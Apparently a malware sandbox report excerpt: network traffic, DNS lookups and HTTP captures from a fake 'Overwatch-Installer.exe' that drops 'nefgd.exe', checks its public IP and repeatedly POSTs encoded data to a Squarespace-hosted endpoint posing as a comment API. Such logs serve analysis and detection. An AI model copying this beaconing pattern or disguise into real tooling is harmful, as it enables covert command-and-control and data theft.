Sep 1, 2024 22:06:32.442090988 CEST	50313	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.442099094 CEST	443	50313	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.445396900 CEST	443	50314	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.445601940 CEST	50314	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.445609093 CEST	443	50314	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.559101105 CEST	443	50313	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.559212923 CEST	443	50313	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.559272051 CEST	50313	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.559545040 CEST	50313	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.559952974 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.559998989 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.560080051 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.561182022 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.561197996 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.595820904 CEST	443	50314	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.595896006 CEST	443	50314	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.595957994 CEST	50314	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.626929045 CEST	50314	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.627320051 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.627345085 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:32.627427101 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.627639055 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:32.627649069 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.032284975 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.033759117 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.033781052 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.082303047 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.083614111 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.083630085 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.161999941 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.162245989 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.162257910 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.207596064 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.207791090 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.207799911 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.291354895 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.291431904 CEST	443	50315	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.291553020 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.291994095 CEST	50315	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.292705059 CEST	50317	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.292731047 CEST	443	50317	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.292802095 CEST	50317	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.293067932 CEST	50317	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.293076992 CEST	443	50317	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.335727930 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.335802078 CEST	443	50316	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.335850954 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.353287935 CEST	50316	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.353570938 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.353584051 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.353646994 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.353847027 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.353857040 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.795573950 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.797049046 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.797065020 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.812813044 CEST	443	50317	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.814135075 CEST	50317	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.814148903 CEST	443	50317	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.926438093 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.926595926 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.926604986 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.941071987 CEST	443	50317	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:33.941231966 CEST	50317	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:33.941243887 CEST	443	50317	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:34.061068058 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:34.061152935 CEST	443	50318	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:34.061327934 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:34.061566114 CEST	50318	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:34.062226057 CEST	50319	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:06:34.062258005 CEST	443	50319	198.185.159.177	192.168.2.5
Sep 1, 2024 22:06:34.062412024 CEST	50319	443	192.168.2.5	198.185.159.177

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 1, 2024 22:02:58.271362066 CEST	192.168.2.5	1.1.1.1	0x211c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:03:14.556493998 CEST	192.168.2.5	1.1.1.1	0xddfa	Standard query (0)	plantain-elk-b8pt.squarespace.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 1, 2024 22:02:58.280371904 CEST	1.1.1.1	192.168.2.5	0x211c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 1, 2024 22:02:58.280371904 CEST	1.1.1.1	192.168.2.5	0x211c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:02:58.280371904 CEST	1.1.1.1	192.168.2.5	0x211c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:02:58.280371904 CEST	1.1.1.1	192.168.2.5	0x211c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:02:58.280371904 CEST	1.1.1.1	192.168.2.5	0x211c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:02:58.280371904 CEST	1.1.1.1	192.168.2.5	0x211c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:03:14.578923941 CEST	1.1.1.1	192.168.2.5	0xddfa	No error (0)	plantain-elk-b8pt.squarespace.com		198.185.159.177	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:03:14.578923941 CEST	1.1.1.1	192.168.2.5	0xddfa	No error (0)	plantain-elk-b8pt.squarespace.com		198.185.159.176	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:03:14.578923941 CEST	1.1.1.1	192.168.2.5	0xddfa	No error (0)	plantain-elk-b8pt.squarespace.com		198.49.23.176	A (IP address)	IN (0x0001)	false
Sep 1, 2024 22:03:14.578923941 CEST	1.1.1.1	192.168.2.5	0xddfa	No error (0)	plantain-elk-b8pt.squarespace.com		198.49.23.177	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	193.122.6.168	80	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 22:02:58.294209003 CEST	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Sep 1, 2024 22:02:59.251622915 CEST	320	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:02:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 706b1be5b823977bedae9026f82d4804 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49715	193.122.6.168	80	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 22:03:27.001632929 CEST	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Sep 1, 2024 22:03:27.592963934 CEST	320	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:03:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 844774f1f63d8f1bba46365ac0fa7e85 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49716	193.122.6.168	80	5856	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 22:03:35.198405027 CEST	68	OUT	GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive
Sep 1, 2024 22:03:35.816576004 CEST	320	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 20:03:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7205a0cdadd650bfc69adfb5bd1f768f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:15 UTC	317	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2024-09-01 20:03:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:15 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:15 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:03:15 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:15 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Baxdoqj2peZrOWNkMTljNzliZDc4YzkzNDQxNzE2ZjUyNWM0ZThm; Path=/; Secure Set-Cookie: crumb=BUVxvEZ4CJKnMjA4NzA1YTAzNGNhZTdjZjQ5OWYwMzU2NTk0MzAw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WhRyaqZ4/Q8zcMe7i Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUVxvEZ4CJKnMjA4NzA1YTAzNGNhZTdjZjQ5OWYwMzU2NTk0MzAw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:16 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:03:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:17 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:17 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 72 66 6c 48 6d 33 6b 74 71 69 57 63 57 6e 33 4a 36 45 4d 33 73 36 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2rflHm3ktqiWcWn3J6EM3s6if6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:03:17 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:16 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbXkqZLpKBJnZGQ5Yjk0YzZhMWU5NjBlYTdlZTYzNmJiMGE4NTIw; Path=/; Secure Set-Cookie: crumb=BaulGtcZkYhWMmEzNDU3YzQ4NGQ1NGI4MTA4ODU5Zjc2YjgyMzY2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: tLHWf7eJ/B4HOwd9S Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaulGtcZkYhWMmEzNDU3YzQ4NGQ1NGI4MTA4ODU5Zjc2YjgyMzY2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49710	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:17 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 320 Expect: 100-continue
2024-09-01 20:03:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:18 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:18 UTC	319	OUT	Data Raw: 3d 75 6b 63 56 59 6b 4b 66 4e 55 38 59 78 51 69 45 47 48 32 73 55 72 73 6d 4f 76 51 48 44 61 57 54 4f 4a 7a 44 56 38 31 37 53 35 2f 76 76 73 54 61 59 6b 48 49 47 25 32 42 6e 46 51 66 58 6e 69 63 74 42 76 77 4b 5a 77 78 49 6a 6b 69 69 68 50 44 75 48 49 4e 34 49 75 30 31 33 50 56 54 39 2f 7a 64 75 67 62 68 77 63 64 62 73 4a 6e 52 4c 32 65 79 4c 39 68 6b 56 46 43 6c 73 6e 4d 6c 55 79 56 6c 37 33 52 4a 43 33 59 71 6f 45 56 6a 55 42 6f 70 4b 6a 4b 5a 75 45 56 36 4b 33 79 35 33 58 78 56 49 6f 4a 54 79 66 44 6d 30 6d 76 76 62 6f 4b 51 30 37 2f 76 32 4a 4d 31 57 64 6d 53 2f 58 4a 4d 50 59 50 4a 71 59 52 67 6c 51 4b 6c 6a 64 39 63 65 43 41 6e 48 2f 37 73 76 35 78 62 41 49 34 31 73 31 34 4b 39 77 30 42 4b 48 64 45 64 49 52 62 4c 44 6a 35 65 55 74 4b 46 47 6e 33 25 Data Ascii: =ukcVYkKfNU8YxQiEGH2sUrsmOvQHDaWTOJzDV817S5/vvsTaYkHIG%2BnFQfXnictBvwKZwxIjkiihPDuHIN4Iu013PVT9/zdugbhwcdbsJnRL2eyL9hkVFClsnMlUyVl73RJC3YqoEVjUBopKjKZuEV6K3y53XxVIoJTyfDm0mvvboKQ07/v2JM1WdmS/XJMPYPJqYRglQKljd9ceCAnH/7sv5xbAI41s14K9w0BKHdEdIRbLDj5eUtKFGn3%
2024-09-01 20:03:18 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:17 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BV6b709vBCGyNzI2YmMxZmYzZTE4MDdjNmY3YWQ1YWE1YjdjODZl; Path=/; Secure Set-Cookie: crumb=BTMPJUpqLQ3IZjVkNzNmNzBkMGU0YmEzZjVhZTdkOTUyMjkyM2Ji; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Qwpp3R0A/J15zsErx Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTMPJUpqLQ3IZjVkNzNmNzBkMGU0YmEzZjVhZTdkOTUyMjkyM2Ji"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49713	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:18 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 596 Expect: 100-continue
2024-09-01 20:03:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:18 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:18 UTC	595	OUT	Data Raw: 3d 32 5a 7a 79 73 32 42 66 46 79 6c 33 4c 32 61 4e 6d 55 61 41 73 5a 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6f 5a 35 5a 49 52 35 58 79 41 6a 44 6c 4e 4f 55 74 59 58 66 70 45 70 32 65 6a 54 7a 43 6b 65 61 65 31 58 6f 35 42 6c 33 37 34 31 6f 25 32 42 41 58 72 6c 58 48 50 48 54 41 5a 45 4e 66 30 4a 7a 6f 62 79 66 37 73 64 63 25 32 42 51 6f 44 70 50 4c 76 75 79 4f 6c 4c 43 62 6b 32 44 4a 46 41 50 31 6e 78 79 79 35 4b 59 49 68 68 50 43 78 56 48 67 69 6b 47 72 49 47 63 4b 68 50 36 63 52 4f 52 63 72 4b 6a 5a 6f 42 33 73 61 53 76 68 43 33 79 43 72 68 62 30 6a 74 66 5a 64 6e 57 38 52 74 6c 25 32 42 42 42 33 58 Data Ascii: =2Zzys2BfFyl3L2aNmUaAsZkpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXoZ5ZIR5XyAjDlNOUtYXfpEp2ejTzCkeae1Xo5Bl3741o%2BAXrlXHPHTAZENf0Jzobyf7sdc%2BQoDpPLvuyOlLCbk2DJFAP1nxyy5KYIhhPCxVHgikGrIGcKhP6cRORcrKjZoB3saSvhC3yCrhb0jtfZdnW8Rtl%2BBB3X
2024-09-01 20:03:19 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:18 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZPE99msATx7YThjYzZlMWFhMDYwNDlkZmYyMWZkYmQ4MjZlNzU1; Path=/; Secure Set-Cookie: crumb=BXg6QE4uIUfjNDEwOWUxNmFkZWQ1ZDI0OGQxMDhiYjBmNGZmYjcz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 1Z8FSLpV/FATMmpMO Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXg6QE4uIUfjNDEwOWUxNmFkZWQ1ZDI0OGQxMDhiYjBmNGZmYjcz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:03:43 UTC	317	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2024-09-01 20:03:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:03:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:03:43 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:03:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:03:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bb0YPHaVBBHkMTlmODliOTQ5OTEyNTgzOWY2MGVjZmFlNGU2ZjE2; Path=/; Secure Set-Cookie: crumb=Bdc2DLqg4mp4YmFmMDVhNmVlYmJkZWQ2OWU4YTQ4OTE2NzJmNzdi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 3yQS3iSC/LerXTKcr Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bdc2DLqg4mp4YmFmMDVhNmVlYmJkZWQ2OWU4YTQ4OTE2NzJmNzdi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49718	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
